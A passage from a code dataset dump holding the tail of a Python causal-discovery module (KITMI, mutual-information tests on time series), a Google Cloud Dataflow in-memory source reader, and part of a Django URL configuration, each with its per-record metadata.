= self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n\n qt = qt.iloc[1:].values\n pt_1 = pt_1.iloc[:-1].values\n if len(r_list) > 0:\n rt_1 = self.series[self.names[r_list]].copy()\n rt_1 = rt_1.iloc[:-1].values\n\n else:\n rt_1 = None\n\n cmi = TestMI()\n # cmi = TestParCorr()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def progressive_removal_of_non_causal_nodes(self):\n if self.verbose:\n print(\"######################################\")\n print(\"Progressive Removal of Non-Causal Nodes\")\n print(\"######################################\")\n\n parents = dict()\n for q in range(self.d):\n parents[self.names[q]] = []\n for p in range(self.d):\n if p != q:\n if self.graph.edges[p, q] == 2:\n parents[self.names[q]].append(self.names[p])\n else:\n parents[self.names[q]].append(self.names[q])\n print(parents)\n\n for q in range(self.d):\n name_q = self.series.columns[q]\n # series_q = self.series[name_q]\n parents_q = parents[name_q].copy()\n for name_p in parents_q:\n p = self.names.tolist().index(name_p)\n parents_q_without_p = list(set(parents[self.series.columns[q]]) - {name_p})\n r_list = []\n for par_name in parents_q_without_p:\n r_list.append(self.names.tolist().index(par_name))\n # series_p = self.series[name_p]\n # series_cond = self.series[parents_q_without_p]\n print(name_p, name_q)\n pval = self.causation_entropy_simple(p, q, r_list)\n if self.verbose:\n print('CE('+name_p+'->'+name_q+'|'+str(parents_q_without_p)+') = '+str(pval))\n if pval > self.sig_lev:\n if self.verbose:\n print('Remove '+name_p+' from parents of '+name_q)\n parents[self.series.columns[q]].remove(name_p)\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n\n def fit(self):\n \"\"\"\n run KITMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # Progressive Removal of Non-Causal Nodes\n self.progressive_removal_of_non_causal_nodes()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\n def _mi_pq(self, p, q):\n \"\"\"\n estimate tmi between two time series\n :param p: time series with index p\n :param q: time series with index q\n :return: p, q and the estimated value of tmi(p,q)\n \"\"\"\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]], windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n print(\"Nodes and windows:\")\n print(self.names[p], self.window_matrix[self.names[q]].loc[self.names[p]])\n print(self.names[q], self.window_matrix[self.names[p]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n mi_pval, mi_val = tmi(x, y, sampling_rate_tuple=(self.sampling_rate[self.names[p]],\n self.sampling_rate[self.names[q]]),\n gamma=self.gamma_matrix[self.names[q]].loc[self.names[p]], p_value=self.p_value)\n # mi_pval, mi_val = ctmi(x, y, None, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value)\n return p, q, mi_pval\n\n def skeleton_initialize(self):\n \"\"\"\n initialize graph, remove all unconditional independencies and rank neighbors\n \"\"\"\n if self.verbose:\n print(\"######################################\")\n print(\"Skeletion Initialization\")\n print(\"######################################\")\n\n # p_list, q_list = np.where(np.triu(self.graph.edges) > 0)\n p_list, q_list = np.where((np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges))) == 2)\n print(self.graph.edges)\n print(np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges)))\n print(p_list, q_list)\n res = Parallel(n_jobs=self.num_processor)(delayed(self._mi_pq)(p, q) for p, q in zip(p_list, q_list))\n\n for pq in range(len(res)):\n p, q, mi = res[pq][0], res[pq][1], res[pq][2]\n self.mi_array[p, q] = mi\n self.mi_array[q, p] = mi\n if self.verbose:\n print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; I(p,q)=\" + \"{: 0.5f}\".format(self.mi_array[p, q]), end=\" \")\n if self.p_value:\n test = self.mi_array[p, q] > self.sig_lev\n else:\n test = self.mi_array[p, q] < self.alpha\n if test:\n if self.verbose:\n print(\"=> Remove link between \"+str(p)+\" and \"+str(q))\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n else:\n if self.verbose:\n print()\n\n def _cmi_sep_set_pq(self, p, q, set_size):\n \"\"\"\n estimate ctmi between two time series conditioned on each set of neighbors with cardinality equal to set_size\n :param p: time series with index p\n :param q: time series with index q\n :param set_size: cardinality of the set of neighbors\n :return: p, q, list if estimated value of ctmi(p,q,r_set), and list of all r_sets\n \"\"\"\n v_list = []\n r_list = [r for r in range(self.graph.d) if (r != p) and (r != q) and ((\n (self.graph.edges[r, p] == 2) and (self.gamma_matrix[self.names[p]].loc[self.names[r]] >= 0)) or (\n (self.graph.edges[r, q] == 2) and (self.gamma_matrix[self.names[q]].loc[self.names[r]] >= 0)))]\n\n r_list = [list(r) for r in itertools.combinations(r_list, set_size)]\n\n r_list_temp = r_list.copy()\n # if set_size == 1:\n for rs in r_list_temp:\n print(rs)\n print(all(elem >= self.d for elem in rs))\n if all(elem >= self.d for elem in rs):\n r_list.remove(rs)\n del r_list_temp\n\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]], windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n for rs in r_list:\n z = dict()\n for r in rs:\n if self.adaptive_window:\n # select and drop NA\n z[self.names[r]] = self.series[self.names[r]].dropna()\n else:\n z[self.names[r]] = self.data_dict[self.names[r]]\n if self.graphical_optimization:\n # cmi_pval, cmi_val = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n # graph=self.graph.edges)\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n p_value=self.rank_using_p_value, instantaneous_dict=self.instantaneous_dict)\n else:\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n instantaneous_dict=self.instantaneous_dict)\n\n if self.rank_using_p_value:\n v_list.append(cmi_pval)\n else:\n v_list.append(cmi_val)\n if v_list:\n return p, q, v_list, r_list\n\n def rank_cmi_sep_set_parallel(self, set_size):\n \"\"\"\n rank pairs of time series based on the estimation of ctmi between each pair of connected time series\n :param set_size: cardinality of the set of neighbors\n :return: ranking of each pair of connected time series based ctmi\n \"\"\"\n list_adj, list_num_adj = self.graph.search_adj_all()\n p_list = [p for p in range(len(list_num_adj)) if list_num_adj[p] > set_size]\n print(p_list)\n q_list = [list_adj[p] for p in p_list]\n p_list = [p_list[p] for p in range(len(p_list)) for _ in q_list[p]]\n q_list = [q for sublist in q_list for q in sublist]\n pq_list = [(p, q) for p, q in zip(p_list, q_list)]\n temp_pq = pq_list.copy()\n temp_p = p_list.copy()\n temp_q = q_list.copy()\n for pq in range(len(temp_pq)):\n if (temp_pq[pq][1], temp_pq[pq][0]) in pq_list:\n pq_list.remove((temp_pq[pq][0], temp_pq[pq][1]))\n p_list.remove(temp_p[pq])\n q_list.remove(temp_q[pq])\n del temp_pq, temp_p, temp_q\n print(list_adj, list_num_adj)\n print(p_list, q_list)\n print(\"set_size \" +str(set_size))\n # res = Parallel(n_jobs=self.num_processor)(delayed(self._cmi_sep_set_pq)(p, q, set_size) for p, q in\n # zip(p_list, q_list))\n res = []\n for p, q in zip(p_list, q_list):\n res.append(self._cmi_sep_set_pq(p, q, set_size))\n\n ranks = RankingList()\n for pq in range(len(res)):\n if res[pq] is not None:\n if isinstance(res[pq][2], list):\n for r in range(len(res[pq][2])):\n ranks.add(res[pq][0], res[pq][1], res[pq][2][r], res[pq][3][r])\n else:\n ranks.add(res[pq][0], res[pq][1], res[pq][2], res[pq][3])\n if self.rank_using_p_value:\n ranks.sort(descending=True)\n else:\n ranks.sort(descending=False)\n return ranks\n\n def find_sep_set(self):\n \"\"\"\n find the most contributing separation set (if it exists) between each pair of time series\n \"\"\"\n if self.verbose:\n print(\"######################################\")\n print(\"Skeletion Speperation\")\n print(\"######################################\")\n\n print(\"max set size = \" + str(self.graph.d-1))\n for set_size in range(1, self.graph.d-1):\n ranks = self.rank_cmi_sep_set_parallel(set_size)\n if self.verbose:\n print(\"Ranking:\")\n print(\"p: \"+str(ranks.elem_p))\n print(\"p: \" + str(ranks.elem_q))\n print(\"p: \" + str(ranks.elem_r))\n print(\"p: \" + str(ranks.val))\n for p, q, r_set, cmi in zip(ranks.elem_p, ranks.elem_q, ranks.elem_r, ranks.val):\n test = (self.graph.edges[p, q] != 0)\n for r in r_set:\n if not test:\n break\n test = test and ((self.graph.edges[q, r] != 0) or (self.graph.edges[p, r] != 0))\n # test = test and ((self.graph.sep[p, r, q] == 0) and (self.graph.sep[q, r, p] == 0))\n if test:\n mi = self.mi_array[p, q]\n\n if self.p_value != self.rank_using_p_value:\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]],\n windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]],\n windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n z = dict()\n for r in r_set:\n if self.adaptive_window:\n # select and drop NA\n z[self.names[r]] = self.series[self.names[r]].dropna()\n else:\n z[self.names[r]] = self.data_dict[self.names[r]]\n if self.graphical_optimization:\n # cmi, _ = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.p_value, graph=self.graph.edges)\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n p_value=self.rank_using_p_value,\n instantaneous_dict=self.instantaneous_dict)\n else:\n cmi, _ = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, p_value=self.p_value,\n instantaneous_dict=self.instantaneous_dict)\n if self.verbose:\n print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; r=\" + str(r_set) + \"; I(p,q|r)=\" + \"{: 0.5f}\".format(\n cmi) + \"; I(p,q)=\" + \"{: 0.5f}\".format(mi), end=\" \")\n\n if self.p_value:\n test = mi < self.sig_lev < cmi\n else:\n test = cmi < self.alpha\n if test:\n self.cmi_array[p, q] = cmi\n self.cmi_array[q, p] = cmi\n if self.verbose:\n print(\"=> remove link between \" + str(p) + \" and \" + str(q))\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n for r in r_set:\n self.graph.add_sep(q, p, r)\n self.biggamma[p,q,r] = self.gamma_matrix[self.names[p]].loc[self.names[r]]\n self.biggamma[q,p,r] = self.gamma_matrix[self.names[q]].loc[self.names[r]]\n else:\n if self.verbose:\n print()\n # self._exclude_past()\n\n def fit2(self):\n \"\"\"\n run PCTMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # initialize skeleton\n self.skeleton_initialize()\n\n # get separation sets\n self.find_sep_set()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\nif __name__ == \"__main__\":\n from data.sim_data import generate_v_structure, generate_fork, diamond_generator, generate_mediator, mooij_7ts\n\n # data = generate_v_structure(2000)\n data = generate_fork(1000)\n # data, _, _ = diamond_generator(2000)\n # data.drop([data.columns[1]], axis=1, inplace=True)\n\n lag = 5\n # d = len(data.columns)\n\n n_iters = 1000\n hidden_size = 25 # d*(order-1)*2\n learning_rate = 0.01\n # input_size = 3\n\n # res = tskiko_mv(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n res = nbcb_k(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n print(res)\n # print(res['discovery'])\n\n # x = mts_order(data, order=order) #[:-order]\n # print(x.loc[2:5])\n # # y = mts_order(data[order+1:], order=order)\n # names_x = x.columns[:-d]\n # names_y = x.columns[-d:]\n # y = x[names_y]\n # x = x[names_x]\n # print(x.shape)\n # print(y.shape)\n", "sub_path": "baselines/scripts_python/python_packages/pwNBCBk/kitmi.py", "file_name": "kitmi.py", "file_ext": "py", "file_size_in_byte": 56359, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.CMIknn", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.ParCorr", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 201, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 270, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 284, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 289, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 296, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "time.time", "line_number": 389, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 415, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 417, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 425, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 425, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 431, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 431, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 434, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 434, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 435, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 435, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 442, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 443, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 445, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 457, "usage_type": "call"}, {"api_name": "time.time", "line_number": 481, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 512, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 512, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 514, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 514, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 518, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 524, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 529, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 532, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 533, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 569, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 572, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 572, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 576, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 576, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 600, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 602, "usage_type": "call"}, {"api_name": "time.time", "line_number": 633, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 716, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 727, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 728, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 736, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 738, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 743, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 744, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 745, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.get_sampling_rate", "line_number": 810, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.get_alpha", "line_number": 813, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 819, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.align_matrix", "line_number": 826, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 828, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 830, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 831, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 856, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 860, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 863, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 905, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 906, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 921, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 998, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1021, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1058, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1060, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 1139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1139, "usage_type": "name"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1165, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1166, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.tmi", "line_number": 1174, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1193, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1193, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 1195, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 1195, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 1229, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1241, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1242, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1259, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1263, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1349, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1351, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1367, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1372, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1406, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1406, "usage_type": "name"}, {"api_name": "data.sim_data", "line_number": 1431, "usage_type": "name"}, {"api_name": "data.sim_data.generate_fork", "line_number": 1431, "usage_type": "call"}, {"api_name": "data.sim_data", "line_number": 1444, "usage_type": "argument"}]}
+{"seq_id": "461396696", "text": "# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"In-memory input source.\"\"\"\n\nimport itertools\n\nfrom google.cloud.dataflow import coders\nfrom google.cloud.dataflow.io import iobase\n\n\nclass InMemorySource(iobase.NativeSource):\n \"\"\"In-memory input source.\"\"\"\n\n def __init__(\n self, elements, coder=coders.Base64PickleCoder(), start_index=None,\n end_index=None):\n self.elements = elements\n self.coder = coder\n\n if start_index is None:\n self.start_index = 0\n else:\n self.start_index = start_index\n\n if end_index is None:\n self.end_index = len(elements)\n else:\n self.end_index = end_index\n\n def __eq__(self, other):\n return (self.elements == other.elements and\n self.coder == other.coder and\n self.start_index == other.start_index and\n self.end_index == other.end_index)\n\n def reader(self):\n return InMemoryReader(self)\n\n\nclass InMemoryReader(iobase.NativeSourceReader):\n \"\"\"A reader for in-memory source.\"\"\"\n\n def __init__(self, source):\n self.source = source\n\n # Index of the next item to be read by the InMemoryReader.\n # Starts at source.start_index.\n self.current_index = source.start_index\n\n def __enter__(self):\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n pass\n\n def __iter__(self):\n for value in itertools.islice(self.source.elements,\n self.source.start_index,\n self.source.end_index):\n self.current_index += 1\n yield self.source.coder.decode(value)\n\n def get_progress(self):\n if (self.current_index >= self.source.end_index or\n self.source.start_index >= self.source.end_index):\n percent_complete = 1\n elif self.current_index == self.source.start_index:\n percent_complete = 0\n else:\n percent_complete = (\n float(self.current_index - self.source.start_index) / (\n self.source.end_index - self.source.start_index))\n\n return iobase.ReaderProgress(percent_complete=percent_complete)\n", "sub_path": "google/cloud/dataflow/worker/inmemory.py", "file_name": "inmemory.py", "file_ext": "py", "file_size_in_byte": 2620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.dataflow.io.iobase.NativeSource", "line_number": 23, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 23, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.coders.Base64PickleCoder", "line_number": 27, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.coders", "line_number": 27, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.io.iobase.NativeSourceReader", "line_number": 52, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 52, "usage_type": "name"}, {"api_name": "itertools.islice", "line_number": 69, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.io.iobase.ReaderProgress", "line_number": 86, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 86, "usage_type": "name"}]}
+{"seq_id": "317494085", "text": "from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'account'\nurlpatterns = [\n url(r'^$', views.show, name='show'),\n url(r'^save/$', views.save_list, name='save_list'),\n url(r'^import/$', views.import_page, name='import_page'),\n url(r'^import/submit$', views.import_csv, name='import_csv'),\n url(r'^export/$', views.export_csv, name='export_csv'),\n url(r'^customize/$', views.custom, name='customize'),\n url(r'^customize/(?P[0-9]+)/edit/$', views.edit, name='edit'),\n url(r'^customize/(?P[0-9]+)/edit/save$', views.edit_save, name='edit_save'),\n url(r'^customize/(?P[0-9]+)/remove/$', views.remove, name='remove'),\n url(r'^customize/(?P[0-9]+)/remove/confirm$', views.remove_confirm, name='remove_confirm'),\n] \n", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 795, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 